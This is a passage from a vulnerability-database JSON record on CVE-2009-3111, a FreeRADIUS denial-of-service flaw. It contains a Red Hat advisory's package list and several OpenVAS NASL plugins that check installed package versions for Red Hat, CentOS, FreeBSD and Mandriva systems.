"freeradius-postgresql", "packageFilename": "freeradius-postgresql-1.1.3-1.5.el5_4.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.1.3-1.5.el5_4", "packageName": "freeradius-unixODBC", "packageFilename": "freeradius-unixODBC-1.1.3-1.5.el5_4.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.1.3-1.5.el5_4", "packageName": "freeradius", "packageFilename": "freeradius-1.1.3-1.5.el5_4.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.1.3-1.5.el5_4", "packageName": "freeradius-postgresql", "packageFilename": "freeradius-postgresql-1.1.3-1.5.el5_4.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.1.3-1.5.el5_4", "packageName": "freeradius-unixODBC", "packageFilename": "freeradius-unixODBC-1.1.3-1.5.el5_4.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.1.3-1.5.el5_4", "packageName": "freeradius", "packageFilename": "freeradius-1.1.3-1.5.el5_4.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.1.3-1.5.el5_4", "packageName": "freeradius-mysql", "packageFilename": "freeradius-mysql-1.1.3-1.5.el5_4.ia64.rpm", "arch": "ia64", "operator": "lt"}], "description": "FreeRADIUS is a high-performance and highly configurable free Remote\nAuthentication Dial In User Service (RADIUS) server, designed to allow\ncentralized authentication and authorization for a network.\n\nAn input validation flaw was discovered in the way FreeRADIUS decoded\nspecific RADIUS attributes from RADIUS packets. A remote attacker could use\nthis flaw to crash the RADIUS daemon (radiusd) via a specially-crafted\nRADIUS packet. (CVE-2009-3111)\n\nUsers of FreeRADIUS are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, radiusd will be restarted automatically.", "reporter": "RedHat", "published": "2009-09-17T04:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "redhat", "title": "(RHSA-2009:1451) Moderate: freeradius security update", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3111"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-09-08T11:59:39", "id": "RHSA-2009:1451", "href": "https://access.redhat.com/errata/RHSA-2009:1451", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "openvas": [{"lastseen": "2018-04-06T11:40:37", "references": ["http://www.vuxml.org/freebsd/1b3f854b-e4bd-11de-b276-000d8787e1be.html", "http://www.milw0rm.com/exploits/9642", "http://freeradius.org/security.html"], "pluginID": "136141256231066614", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "edition": 1, "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "published": "2009-12-30T00:00:00", "type": "openvas", "title": "FreeBSD Ports: freeradius", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "FreeBSD Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0967", "CVE-2009-3111"], "modified": "2018-04-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066614", "id": "OPENVAS:136141256231066614", "sourceData": "#\n#VID 1b3f854b-e4bd-11de-b276-000d8787e1be\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 1b3f854b-e4bd-11de-b276-000d8787e1be\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: freeradius\n\nCVE-2009-3111\nThe rad_decode function in FreeRADIUS before 1.1.8 allows remote\nattackers to cause a denial of service (radiusd crash) via zero-length\nTunnel-Password attributes. NOTE: this is a regression error related\nto CVE-2003-0967.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\";\n\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66614\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-30 21:58:43 +0100 (Wed, 30 Dec 2009)\");\n script_cve_id(\"CVE-2009-3111\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"FreeBSD Ports: freeradius\");\n\n script_xref(name:\"URL\", value:\"http://freeradius.org/security.html\");\n script_xref(name:\"URL\", value:\"http://www.milw0rm.com/exploits/9642\");\n script_xref(name:\"URL\", value:\"http://www.vuxml.org/freebsd/1b3f854b-e4bd-11de-b276-000d8787e1be.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"freeradius\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.1.8\")<0) {\n txt += 'Package freeradius version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-27T10:55:39", "references": ["http://www.redhat.com/security/updates/classification/#moderate", "http://rhn.redhat.com/errata/RHSA-2009-1451.html"], "pluginID": "64905", "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:1451.\n\nFreeRADIUS is a high-performance and highly configurable free Remote\nAuthentication Dial In User Service (RADIUS) server, designed to allow\ncentralized authentication and authorization for a network.\n\nAn input validation flaw was discovered in the way FreeRADIUS decoded\nspecific RADIUS attributes from RADIUS packets. A remote attacker could use\nthis flaw to crash the RADIUS daemon (radiusd) via a specially-crafted\nRADIUS packet. (CVE-2009-3111)\n\nUsers of FreeRADIUS are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, radiusd will be restarted automatically.", "edition": 2, "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "published": "2009-09-21T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "RedHat Security Advisory RHSA-2009:1451", "type": "openvas", "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0967", "CVE-2009-3111"], "modified": "2017-07-12T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=64905", "id": "OPENVAS:64905", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_1451.nasl 6683 2017-07-12 09:41:57Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:1451 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:1451.\n\nFreeRADIUS is a high-performance and highly configurable free Remote\nAuthentication Dial In User Service (RADIUS) server, designed to allow\ncentralized authentication and authorization for a network.\n\nAn input validation flaw was discovered in the way FreeRADIUS decoded\nspecific RADIUS attributes from RADIUS packets. A remote attacker could use\nthis flaw to crash the RADIUS daemon (radiusd) via a specially-crafted\nRADIUS packet. (CVE-2009-3111)\n\nUsers of FreeRADIUS are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, radiusd will be restarted automatically.\";\n\ntag_solution = \"Please note that this update is available via\nRed Hat Network. To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\n\n\nif(description)\n{\n script_id(64905);\n script_version(\"$Revision: 6683 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:41:57 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-21 23:13:00 +0200 (Mon, 21 Sep 2009)\");\n script_cve_id(\"CVE-2009-3111\", \"CVE-2003-0967\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"RedHat Security Advisory RHSA-2009:1451\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-1451.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#moderate\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"freeradius\", rpm:\"freeradius~1.1.3~1.5.el5_4\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"freeradius-debuginfo\", rpm:\"freeradius-debuginfo~1.1.3~1.5.el5_4\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"freeradius-mysql\", rpm:\"freeradius-mysql~1.1.3~1.5.el5_4\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"freeradius-postgresql\", rpm:\"freeradius-postgresql~1.1.3~1.5.el5_4\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"freeradius-unixODBC\", rpm:\"freeradius-unixODBC~1.1.3~1.5.el5_4\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:55:29", "references": ["2009:1451", "http://lists.centos.org/pipermail/centos-announce/2009-October/016228.html"], "pluginID": "880824", "description": "Check for the Version of freeradius", "edition": 2, "reporter": "Copyright (c) 2011 Greenbone Networks GmbH", "published": "2011-08-09T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "CentOS Update for freeradius CESA-2009:1451 centos5 i386", "type": "openvas", "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0967", "CVE-2009-3111"], "modified": "2017-07-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=880824", "id": "OPENVAS:880824", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for freeradius CESA-2009:1451 centos5 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"FreeRADIUS is a high-performance and highly configurable free Remote\n Authentication Dial In User Service (RADIUS) server, designed to allow\n centralized authentication and authorization for a network.\n\n An input validation flaw was discovered in the way FreeRADIUS decoded\n specific RADIUS attributes from RADIUS packets. A remote attacker could use\n this flaw to crash the RADIUS daemon (radiusd) via a specially-crafted\n RADIUS packet. (CVE-2009-3111)\n \n Users of FreeRADIUS are advised to upgrade to these updated packages, which\n contain a backported patch to correct this issue. After installing the\n update, radiusd will be restarted automatically.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"freeradius on CentOS 5\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2009-October/016228.html\");\n script_id(880824);\n script_version(\"$Revision: 6653 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:46:53 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"CESA\", value: \"2009:1451\");\n script_cve_id(\"CVE-2009-3111\", \"CVE-2003-0967\");\n script_name(\"CentOS Update for freeradius CESA-2009:1451 centos5 i386\");\n\n script_summary(\"Check for the Version of freeradius\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"freeradius\", rpm:\"freeradius~1.1.3~1.5.el5_4\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"freeradius-mysql\", rpm:\"freeradius-mysql~1.1.3~1.5.el5_4\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"freeradius-postgresql\", rpm:\"freeradius-postgresql~1.1.3~1.5.el5_4\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"freeradius-unixODBC\", rpm:\"freeradius-unixODBC~1.1.3~1.5.el5_4\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-01-18T11:04:38", "references": ["http://lists.mandriva.com/security-announce/2010-01/msg00022.php", "2009:227-1"], "pluginID": "1361412562310830798", "description": "Check for the Version of freeradius", "edition": 1, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-01-15T00:00:00", "type": "openvas", "title": "Mandriva Update for freeradius MDVSA-2009:227-1 (freeradius)", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Mandrake Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0967", "CVE-2009-3111"], "modified": "2018-01-17T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310830798", "id": "OPENVAS:1361412562310830798", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for freeradius MDVSA-2009:227-1 (freeradius)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been found and corrected in freeradius:\n\n The rad_decode function in FreeRADIUS before 1.1.8 allows remote\n attackers to cause a denial of service (radiusd crash) via zero-length\n Tunnel-Password attributes. NOTE: this is a regression error related\n to CVE-2003-0967 (CVE-2009-3111).\n \n This update provides a solution to this vulnerability.\n \n Update:\n \n Packages for 2008.0 are provided for Corporate Desktop 2008.0\n customers.\";\n\ntag_affected = \"freeradius on Mandriva Linux 2008.0,\n Mandriva Linux 2008.0/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2010-01/msg00022.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.830798\");\n script_version(\"$Revision: 8440 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-17 08:58:46 +0100 (Wed, 17 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-01-15 10:29:41 +0100 (Fri, 15 Jan 2010)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"MDVSA\", value: \"2009:227-1\");\n script_cve_id(\"CVE-2003-0967\", \"CVE-2009-3111\");\n script_name(\"Mandriva Update for freeradius MDVSA-2009:227-1 (freeradius)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of freeradius\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2008.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"freeradius\", rpm:\"freeradius~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libfreeradius1\", rpm:\"libfreeradius1~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libfreeradius1-devel\", rpm:\"libfreeradius1-devel~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libfreeradius1-krb5\", rpm:\"libfreeradius1-krb5~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libfreeradius1-ldap\", rpm:\"libfreeradius1-ldap~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libfreeradius1-mysql\", rpm:\"libfreeradius1-mysql~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libfreeradius1-postgresql\", rpm:\"libfreeradius1-postgresql~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libfreeradius1-unixODBC\", rpm:\"libfreeradius1-unixODBC~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64freeradius1\", rpm:\"lib64freeradius1~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64freeradius1-devel\", rpm:\"lib64freeradius1-devel~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64freeradius1-krb5\", rpm:\"lib64freeradius1-krb5~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64freeradius1-ldap\", rpm:\"lib64freeradius1-ldap~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64freeradius1-mysql\", rpm:\"lib64freeradius1-mysql~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64freeradius1-postgresql\", rpm:\"lib64freeradius1-postgresql~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64freeradius1-unixODBC\", rpm:\"lib64freeradius1-unixODBC~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-12-21T11:32:31", "references": ["http://lists.mandriva.com/security-announce/2010-01/msg00022.php", "2009:227-1"], "pluginID": "830798", "description": "Check for the Version of freeradius", "edition": 3, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-01-15T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "Mandriva Update for freeradius MDVSA-2009:227-1 (freeradius)", "type": "openvas", "naslFamily": "Mandrake Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0967", "CVE-2009-3111"], "modified": "2017-12-20T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=830798", "id": "OPENVAS:830798", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for freeradius MDVSA-2009:227-1 (freeradius)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been found and corrected in freeradius:\n\n The rad_decode function in FreeRADIUS before 1.1.8 allows remote\n attackers to cause a denial of service (radiusd crash) via zero-length\n Tunnel-Password attributes. NOTE: this is a regression error related\n to CVE-2003-0967 (CVE-2009-3111).\n \n This update provides a solution to this vulnerability.\n \n Update:\n \n Packages for 2008.0 are provided for Corporate Desktop 2008.0\n customers.\";\n\ntag_affected = \"freeradius on Mandriva Linux 2008.0,\n Mandriva Linux 2008.0/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2010-01/msg00022.php\");\n script_id(830798);\n script_version(\"$Revision: 8186 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-20 07:30:34 +0100 (Wed, 20 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-01-15 10:29:41 +0100 (Fri, 15 Jan 2010)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"MDVSA\", value: \"2009:227-1\");\n script_cve_id(\"CVE-2003-0967\", \"CVE-2009-3111\");\n script_name(\"Mandriva Update for freeradius MDVSA-2009:227-1 (freeradius)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of freeradius\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2008.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"freeradius\", rpm:\"freeradius~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libfreeradius1\", rpm:\"libfreeradius1~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libfreeradius1-devel\", rpm:\"libfreeradius1-devel~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libfreeradius1-krb5\", rpm:\"libfreeradius1-krb5~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libfreeradius1-ldap\", rpm:\"libfreeradius1-ldap~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libfreeradius1-mysql\", rpm:\"libfreeradius1-mysql~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libfreeradius1-postgresql\", 